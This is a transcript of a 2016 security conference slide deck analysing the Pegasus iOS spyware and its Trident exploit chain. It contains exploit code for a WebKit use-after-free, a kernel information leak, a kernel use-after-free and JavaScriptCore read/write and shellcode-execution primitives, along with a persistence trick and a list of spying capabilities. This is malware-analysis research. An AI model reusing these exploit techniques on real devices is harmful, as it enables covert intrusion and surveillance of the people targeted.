Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Pegasus Internals

Max Bazaliy
December 27, 2016

Pegasus Internals

33c3, Hamburg, Germany, 2016

Max Bazaliy

December 27, 2016
Tweet

More Decks by Max Bazaliy

Other Decks in Technology

Transcript

  1. December 27-30, 2016 33с3 1 2 3 4 5 6

    7 8 9 10 11 12 Pegasus Internals Max Bazaliy
  2. December 27-30, 2016 33с3 About me 1 2 3 4

    5 6 7 8 9 10 11 12 o  Kiev, Ukraine o  Staff Security Researcher at Lookout o  XNU, Linux and LLVM internals o  Obfuscation and DRM systems in a past o  Fried Apple team co-founder (8.x and 9.x jailbreaks)
  3. December 27-30, 2016 33с3 o  Pegasus is espionage software o 

    Non public remote jailbreak o  The jailbreak is achieved via Trident exploit chain 1 2 3 4 5 6 7 8 9 10 11 12 What is Pegasus ?
  4. December 27-30, 2016 33с3 1 2 3 4 5 6

    7 8 9 10 11 12 How we got a sample ?
  5. December 27-30, 2016 33с3 1 2 3 4 5 6

    7 8 9 10 11 12 WebKit RCE XNU exploitation Kernel info leak CVE-2016-4655 + Kernel UAF CVE-2016-4656 Safari UAF CVE-2016-4657 Re-jailbreak on reboot + Init. app hooks + Sync with C&C server Surveillance + persistence Stage 1 Stage 2 Stage 3 How does Pegasus operates on iOS ?
  6. December 27-30, 2016 33с3 •  Spear-phish URL – Single use

    •  Contains obfuscated JavaScript o  Checks for device compatibility (iPhone, 32/64) o  Contains URLs for Stage 2 o  Contains an RCE in WebKit Stage 1 - Payload 1 2 3 4 5 6 7 8 9 10 11 12
  7. December 27-30, 2016 33с3 •  Visiting a maliciously crafted website

    may lead to arbitrary code execution ◦  Remote code execution in Webkit ◦  Vulnerability is use after free ◦  Accomplished by two bugs ◦  Not stable as it relies on WebKit garbage collector CVE-2016-4657 details 1 2 3 4 5 6 7 8 9 10 11 12
  8. December 27-30, 2016 33с3 static JSValue defineProperties(ExecState* exec, JSObject* object,

    JSObject* properties) { ... size_t numProperties = propertyNames.size(); Vector<PropertyDescriptor> descriptors; // vector that will hold property descriptors MarkedArgumentBuffer markBuffer; for (size_t i = 0; i < numProperties; i++) { // 1-st loop JSValue prop = properties->get(exec, propertyNames[i]); ... PropertyDescriptor descriptor; if (!toPropertyDescriptor(exec, prop, descriptor)) return jsNull(); descriptors.append(descriptor); if (descriptor.isDataDescriptor() && descriptor.value()) markBuffer.append(descriptor.value()); ... Source: http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/runtime/ObjectConstructor.cpp Save property descriptor to descriptors vector Property descriptor marked using append() and MarkedAgrumentBuffer defineProperties internals 1 2 3 4 5 6 7 8 9 10 11 12
  9. December 27-30, 2016 33с3 ... for (size_t i = 0;

    i < numProperties; i++) { // 2-nd loop Identifier propertyName = propertyNames[i]; if (exec->propertyNames().isPrivateName(propertyName)) continue; /* triggers user defined methods */ object->methodTable(exec->vm())->defineOwnProperty(object,exec, propertyName, descriptors[i], true); if (exec->hadException()) return jsNull(); } return object; } Source: http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/runtime/ObjectConstructor.cpp Associate each property with target object May call user defined method defineProperties internals continued 1 2 3 4 5 6 7 8 9 10 11 12
  10. December 27-30, 2016 33с3 class MarkedArgumentBuffer { static const size_t

    inlineCapacity = 8; public: MarkedArgumentBuffer() : m_size(0) , m_capacity(inlineCapacity) ... int m_size; int m_capacity; ... void append(JSValue v) { if (m_size >= m_capacity) return slowAppend(v); slotFor(m_size) = JSValue::encode(v); ++m_size; } Size of inline stack buffer is limited to 8 Move buffer to the heap on 9-th iteration Source http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/runtime/ArgList.h MarkedArgumentBuffer internals 1 2 3 4 5 6 7 8 9 10 11 12
  11. December 27-30, 2016 33с3 void MarkedArgumentBuffer::slowAppend(JSValue v) { int newCapacity

    = m_capacity * 4; EncodedJSValue* newBuffer = new EncodedJSValue[newCapacity]; for (int i = 0; i < m_capacity; ++i) newBuffer[i] = m_buffer[i]; // copy from stack to heap m_buffer = newBuffer; // move the actual buffer pointer to m_capacity = newCapacity; // the new heap backing slotFor(m_size) = JSValue::encode(v); ++m_size; for (int i = 0; i < m_size; ++i) { Heap* heap = Heap::heap(JSValue::decode(slotFor(i))); if (!heap) continue; m_markSet = &heap->markListSet(); // add the MarkedArgumentBuffer m_markSet->add(this); // to the heap markset break; ... Move buffer from stack to heap Get heap context and add MarkedArgumentBuffer to the heap markListSet Do not add to markset if heap is null Source: http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/runtime/ArgList.cpp 1 2 3 4 5 6 7 8 9 10 11 12
  12. December 27-30, 2016 33с3 inline Heap* Heap::heap(const JSValue v) {

    if (!v.isCell()) return 0; return heap(v.asCell()); } inline bool JSValue::isCell() const { return !(u.asInt64 & TagMask); } Will return NULL for primitive types as Integers, Booleans, etc Source: http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/heap/HeapInlines.h void append(JSValue v) { if (m_size >= m_capacity) return slowAppend(v); slotFor(m_size) = JSValue::encode(v); ++m_size; } Will be called just once, when m_size == m_capacity Heap internals 13 14 15 16 17 18 19 20 21 22 23 24
  13. December 27-30, 2016 33с3 13 14 15 16 17 18

    19 20 21 22 23 24 User defined method call may release reference to an object Move objects from stack to heap Any reference to a heap property (after the 9th) may be not protected
  14. December 27-30, 2016 33с3 13 14 15 16 17 18

    19 20 21 22 23 24 var arr = new Array(2047); var props = { p0 : { value : 0 }, ... p8 : { value : 8 }, length : { value : not_number }, stale : { value : arr }, after : { value : 666 } }; length of not_number will trigger toString method Remove references to arr object, trigger garbage collection and re- allocate object var target = []; Object.defineProperties(target, props); var not_number = {}; not_number.toString = function() { arr = null; props["stale"]["value"] = null; … //Trigger garbage collection and reallocate //over stale object return 10; }; Pegasus UAF exploitation for RCE
  15. December 27-30, 2016 33с3 13 14 15 16 17 18

    19 20 21 22 23 24 o  Contains shellcode and compressed data o  Shellcode used for kernel exploitation in Safari o  Compressed data: o  Stage 3 loader (downloads and decrypts Stage 3) o  Configuration file (keys and links) Stage 2 - Payload
  16. December 27-30, 2016 33с3 • An application may be able to

    disclose kernel memory ◦ Infoleak used to get the kernel’s addresses to bypass KASLR ◦ Constructor and OSUnserializeBinary methods were missing bounds checking ◦ Uses the OSNumber object with a high number of bits ◦ Trigger happens in is_io_registry_entry_get_property_bytes ◦ Can be triggered from an app’s sandbox 13 14 15 16 17 18 19 20 21 22 23 24 CVE-2016-4655 details
  17. December 27-30, 2016 33с3 OSObject * OSUnserializeBinary(const char *buffer, size_t

    bufferSize, OSString **errorString) { ... uint32_t key, len, wordLen; len = (key & kOSSerializeDataMask); ... case kOSSerializeNumber: bufferPos += sizeof(long long); if (bufferPos > bufferSize) break; value = next[1]; value <<= 32; value |= next[0]; o = OSNumber::withNumber(value, len); next += 2; break; Source: https://opensource.apple.com/source/xnu/xnu-3248.60.10/libkern/c++/OSSerializeBinary.cpp No number length check OSUnserializeBinary – OSNumber problem 13 14 15 16 17 18 19 20 21 22 23 24
  18. December 27-30, 2016 33с3 bool OSNumber::init(unsigned long long inValue, unsigned

    int newNumberOfBits) { if (!super::init()) return false; size = newNumberOfBits; value = (inValue & sizeMask); return true; } unsigned int OSNumber::numberOfBytes() const { return (size + 7) / 8; } Source: https://opensource.apple.com/source/xnu/xnu-3248.60.10/libkern/c++/OSNumber.cpp No number length check numberOfBytes return value is under attacker’s control OSNumber missing check 13 14 15 16 17 18 19 20 21 22 23 24
  19. December 27-30, 2016 33с3 kern_return_t is_io_registry_entry_get_property_bytes( io_object_t registry_entry, io_name_t property_name,

    io_struct_inband_t buf, mach_msg_type_number_t *dataCnt ) { ... UInt64 offsetBytes; // stack based buffer ... } else if( (off = OSDynamicCast( OSNumber, obj ))) { offsetBytes = off->unsigned64BitValue(); len = off->numberOfBytes(); bytes = &offsetBytes; ... if (bytes) { if( *dataCnt < len) ret = kIOReturnIPCError; else { *dataCnt = len; bcopy( bytes, buf, len ); // copy from stack based buffer } Source: http://opensource.apple.com/source/xnu/xnu-3248.60.10/iokit/Kernel/IOUserClient.cpp Will be returned to userland We control this value Points to stack based buffer 13 14 15 16 17 18 19 20 21 22 23 24
  20. December 27-30, 2016 33с3 io_service_open_extended(service, mach_task_self(), 0, record, properties, 104,

    &result, &connection); IORegistryEntryGetChildIterator(service, "IOService", &io_iterator); io_object_t lol; do { lol = IOIteratorNext(io_iterator); if (!lol) return size = 4096; bzero(dataBuffer, 4096); } while ( IORegistryEntryGetProperty(lol, "HIDKeyboardModifierMappingSrc", dataBuffer, &size) ); if ( size > 8 ) { uint64_t *data_ptr64 = (uint64_t*)dataBuffer; uint64_t kernel_base = data_ptr64[8] & 0xFFFFFFFFFFF00000LL; // read 8-th index of kernel stack NSLog(@"kernel_base %llx", kernel_base ); } OSNumber with length of 256 Copied kernel stack memory Infoleak exploitation 13 14 15 16 17 18 19 20 21 22 23 24
  21. December 27-30, 2016 33с3 • An application may be able to

    execute arbitrary code with kernel privileges o  Use after free to gain kernel level code execution o  The setAtIndex macro does not retain an object o  Trigger happens in OSUnserializeBinary o  Can be triggered from an app’s sandbox CVE-2016-4656 details 13 14 15 16 17 18 19 20 21 22 23 24
  22. December 27-30, 2016 33с3 OSObject * OSUnserializeBinary(const char *buffer, size_t

    bufferSize, OSString **errorString) { ... while (ok) { ... newCollect = isRef = false; o = 0; newDict = 0; newArray = 0; newSet = 0; switch (kOSSerializeTypeMask & key) { case kOSSerializeDictionary: case kOSSerializeArray: case kOSSerializeSet: case kOSSerializeObject: case kOSSerializeNumber: case kOSSerializeSymbol: case kOSSerializeString: case kOSSerializeData: case kOSSerializeBoolean: enum { kOSSerializeDictionary = 0x01000000U, kOSSerializeArray = 0x02000000U, kOSSerializeSet = 0x03000000U, kOSSerializeNumber = 0x04000000U, kOSSerializeSymbol = 0x08000000U, kOSSerializeString = 0x09000000U, kOSSerializeData = 0x0a000000U, kOSSerializeBoolean = 0x0b000000U, kOSSerializeObject = 0x0c000000U, kOSSerializeTypeMask = 0x7F000000U, kOSSerializeDataMask = 0x00FFFFFFU, kOSSerializeEndCollecton = 0x80000000U, }; #define kOSSerializeBinarySignature "\323\0\0" Source: https://opensource.apple.com/source/xnu/xnu-3248.60.10/libkern/c++/OSSerializeBinary.cpp Old friend OSUnserializebinary 13 14 15 16 17 18 19 20 21 22 23 24
  23. December 27-30, 2016 33с3 #define setAtIndex(v, idx, o) \ if

    (idx >= v##Capacity) { \ uint32_t ncap = v##Capacity + 64; \ typeof(v##Array) nbuf = \ (typeof(v##Array)) kalloc_container(ncap * sizeof(o)); \ if (!nbuf) ok = false; \ if (v##Array) \ { \ bcopy(v##Array, nbuf, v##Capacity * sizeof(o)); kfree(v##Array, v##Capacity * sizeof(o)); } \ v##Array = nbuf; \ v##Capacity = ncap; \ } \ if (ok) v##Array[idx] = o; Object saved, but not retained Source: https://opensource.apple.com/source/xnu/xnu-3248.60.10/libkern/c++/OSSerializeBinary.cpp setAtIndex problem 13 14 15 16 17 18 19 20 21 22 23 24
  24. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 if (dict) { if (sym) { ... } else { sym = OSDynamicCast(OSSymbol, o); if (!sym && (str = OSDynamicCast(OSString, o))) { sym = (OSSymbol *) OSSymbol::withString(str); o->release(); o = 0; } ok = (sym != 0); } } case kOSSerializeObject: if (len >= objsIdx) break; o = objsArray[len]; o->retain(); isRef = true; break; Object saved to objs array destroyed Deallocated object retained Source: https://opensource.apple.com/source/xnu/xnu-3248.60.10/libkern/c++/OSSerializeBinary.cpp UAF trigger
  25. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 encoding = kOSSerializeEndCollecton | kOSSerializeDictionary | 16; memcpy(ptr++, &encoding, 4); encoding = kOSSerializeString | 4; // length 4 memcpy(ptr++, &encoding, 4); memcpy(ptr++, "sy2", 4); encoding = kOSSerializeData | 32; // length 32 memcpy(ptr++, &encoding, 4); // OSData data is new object with vtable for deallocated OSString object memcpy(ptr, OSData_data, OSStringSize); ptr = ptr + OSStringSize / 4; // Trigger UAF with kOSSerializeObject, index 1 of objsArray encoding = kOSSerializeEndCollecton | kOSSerializeObject | 1; memcpy(ptr, &encoding, 4); uint64_t result = io_service_open_extended(service, mach_task_self(), 0, record, dataBuffer, 56, &result, &connection); Trigger OSString deallocation Trigger new OSData allocation Trigger use after free UAF exploitation
  26. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 o  setuid KPP race to escalate privileges o  amfi_get_out_of_my_way to disable AMFI o  cs_enforcement_disable to disable code signature check o  mac_mount and LwVM to remount sys partition Post exploitation – Kernel patches
  27. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 •  Processes: ◦  lw-install - spawns all sniffing services ◦  watchdog - process manager ◦  systemd - reporting module ◦  workerd - SIP module ◦  converter - Cynject from Cydia •  Other: ◦  com.apple.itunesstored.2.csstore - JS used for unsigned code execution ◦  ca.crt - root cert used w/ SIP module •  Dylibs: ◦  libdata.dylib - Cydia substrate ◦  libaudio.dylib - calls sniffer ◦  libimo.dylib - imo.im sniffer ◦  libvbcalls.dylib - Viber sniffer ◦  libwacalls.dylib - Whatsapp sniffer Stage 3 Payload – Espionage software
  28. December 27-30, 2016 33с3 com.apple.itunesstored.2.csstore 25 26 27 28 29

    30 31 32 33 34 35 36 o  JSC bug that led to unsigned code execution o  Used with rtbuddyd trick to gain persistence o  Bad cast in setEarlyValue o  Triggerable only from an jsc process context
  29. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 EncodedJSValue JSC_HOST_CALL functionSetImpureGetterDelegate(ExecState* exec) { JSLockHolder lock(exec); JSValue base = exec->argument(0); if (!base.isObject()) return JSValue::encode(jsUndefined()); JSValue delegate = exec->argument(1); if (!delegate.isObject()) return JSValue::encode(jsUndefined()); ImpureGetter* impureGetter = jsCast<ImpureGetter*>(asObject(base.asCell())); impureGetter->setDelegate(exec->vm(), asObject(delegate.asCell())); return JSValue::encode(jsUndefined()); } Source: http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/jsc.cpp set delegate object setImpureGetterDelegate internals
  30. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 template <typename T> inline void WriteBarrierBase<T>::setEarlyValue(VM& vm, const JSCell* owner, T* value) { // no value type check before cast this->m_cell = reinterpret_cast<JSCell*>(value); vm.heap.writeBarrier(owner, this->m_cell); } Source: http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/runtime/WriteBarrierInlines.h Cast without type check Bad cast problem
  31. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 int64 functionSetImpureGetterDelegate(__int64 exec) { ... lock = JSC::JSLockHolder::JSLockHolder(&v11, exec); v3 = *(signed int *)(v1 + 32); if ( (_DWORD)v3 == 1 ) goto LABEL_14; base = *(_QWORD *)(v1 + 0x30); // argument(0) call if ( base & 0xFFFF000000000002LL ) // isObject() call inlined goto LABEL_14; … delegate = *(_QWORD *)(v1 + 0x38); // argument(1) call if ( delegate & 0xFFFF000000000002LL ) // isObject() inlined goto LABEL_14; if ( *(unsigned __int8 *)(delegate + 5) < 0x12u ) goto LABEL_14; v6 = *(_QWORD *)((*(_QWORD *)(v1 + 24) & 0xFFFFFFFFFFFFC000LL) + 0xE8); *(_QWORD *)(base + 0x10) = delegate; class JSArrayBufferView : public JSNonFinalObject { CopyBarrier<char> m_vector; uint32_t m_length; TypedArrayMode m_mode; }; Overwrite m_vector field with delegate value Bad cast problem detailed
  32. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 var DATAVIEW_ARRAYBUFFER_OFFSET = 0x10; var __dummy_ab = new ArrayBuffer(0x20); var __dataview_init_rw = new DataView(__dummy_ab); var __dataview_rw = new DataView(__dummy_ab); // change __dataview_init_rw.m_vector to the address of __dataview_rw setImpureGetterDelegate(__dataview_init_rw, __dataview_rw); // Modify the m_vector of the __dataview_rw JSArrayBufferView to 0 __dataview_init_rw.setUint32(DATAVIEW_ARRAYBUFFER_OFFSET, 0, true); // Modify the m_length of the __dataview_rw JSArrayBufferView to MAX_INT (4gb). // The dataview now effectively maps all of the memory of a 32bit process. __dataview_init_rw.setUint32(DATAVIEW_BYTELENGTH_OFFSET, 0xFFFFFFFF, true); // change the underlying type of the __dataview_rw JSArrayBufferView to FastTypedArray. __dataview_init_rw.setUint8(DATAVIEW_MODE_OFFSET, FAST_TYPED_ARRAY_MODE, true); Trigger bad cast and overwrite m_vector Now we can modify object fields Exploitation – bad cast – RW primitives
  33. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 var dummy_ab = new ArrayBuffer(0x20); var dataview_leak_addr = new DataView(dummy_ab); var dataview_dv_leak = new DataView(dummy_ab); setImpureGetterDelegate(dataview_dv_leak, dataview_leak_addr); setImpureGetterDelegate(dataview_leak_addr, object_to_leak); leaked_addr = dataview_dv_leak.getUint32(DATAVIEW_ARRAYBUFFER_OFFSET, true); var body = ' ' for (var k = 0; k < 0x600; k++) { body += 'try {} catch(e) {};'; } var to_overwrite = new Function('a', body); for (var i = 0; i < 0x10000; i++) { to_overwrite(); } Leak object address Allocate JIT region, leak address, overwrite with shellcode and execute Exploitation – bad cast – exec primitive
  34. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 o  System will launch “rtbuddyd --early-boot” o  Copy jsc as /usr/libexec/rtbuddyd o  Copy js exploit as symlink named “--early-boot” o  Result will be the same as launch “jsc js_exploit” Persistence mechanism
  35. December 27-30, 2016 33с3 25 26 27 28 29 30

    31 32 33 34 35 36 o  One time use links (redirects to Google or other sites) o  Obfuscated JavaScript and Objective-C code o  Obfuscate strings with AES o  Payloads are re-encrypted with a new key on each time o  Spyware components are hidden as system services Techniques to prevent analysis
  36. December 27-30, 2016 33с3 o  Blocks iOS system updates o 

    Clears Mobile Safari history and caches o  Uses SIP for communication o  Removes itself via self destruct mechanisms Techniques to stay undetectable 37 38 39 40 41 42 43 44 45 46 47 48
  37. December 27-30, 2016 33с3 o  Records any microphone usage o 

    Records video from camera o  Gathers sim card and cell network information o  Gathers GPS location o  Gathers keychain passwords (including WiFi and router) Techniques to gather data 37 38 39 40 41 42 43 44 45 46 47 48
  38. December 27-30, 2016 33с3 o iOS sandbox prevent apps from spying

    on each other o On a jailbroken device we can install spying “hooks” o Pegasus uses Cydia Substrate to install app “hooks” o Dynamic libraries are injected into the application processes o Cynject to inject into running processes Application hooking 37 38 39 40 41 42 43 44 45 46 47 48
  39. December 27-30, 2016 33с3 Frameworks Pegasus Apps Darwin App level

    hooks Framework level hooks Pegasus infected device 37 38 39 40 41 42 43 44 45 46 47 48
  40. December 27-30, 2016 33с3 o  Non-public remote jailbreak o  No

    user interaction required o  Exploit chain can be triggered from within the application sandbox o  2011 public jailbreak “jailbreakme 3” is most similar o  Luca Todesco use one Trident exploit for jbme in 2016 Historical analysis 37 38 39 40 41 42 43 44 45 46 47 48
  41. December 27-30, 2016 33с3 o  Citizen Lab: Bill Marczak, John

    Scott-Railton, and Ron Deibert o  Lookout: Andrew Blaich, Seth Hardy, John Roark, Robert Nickle, Michael Flossman, Christina Olson, Christoph Hebeisen, Pat Ford, Colin Streicher, Kristy Edwards and Mike Murray o  Divergent Security: Cris Neckar, Greg Sinclair o  Individual researchers: in7egral Special thanks 37 38 39 40 41 42 43 44 45 46 47 48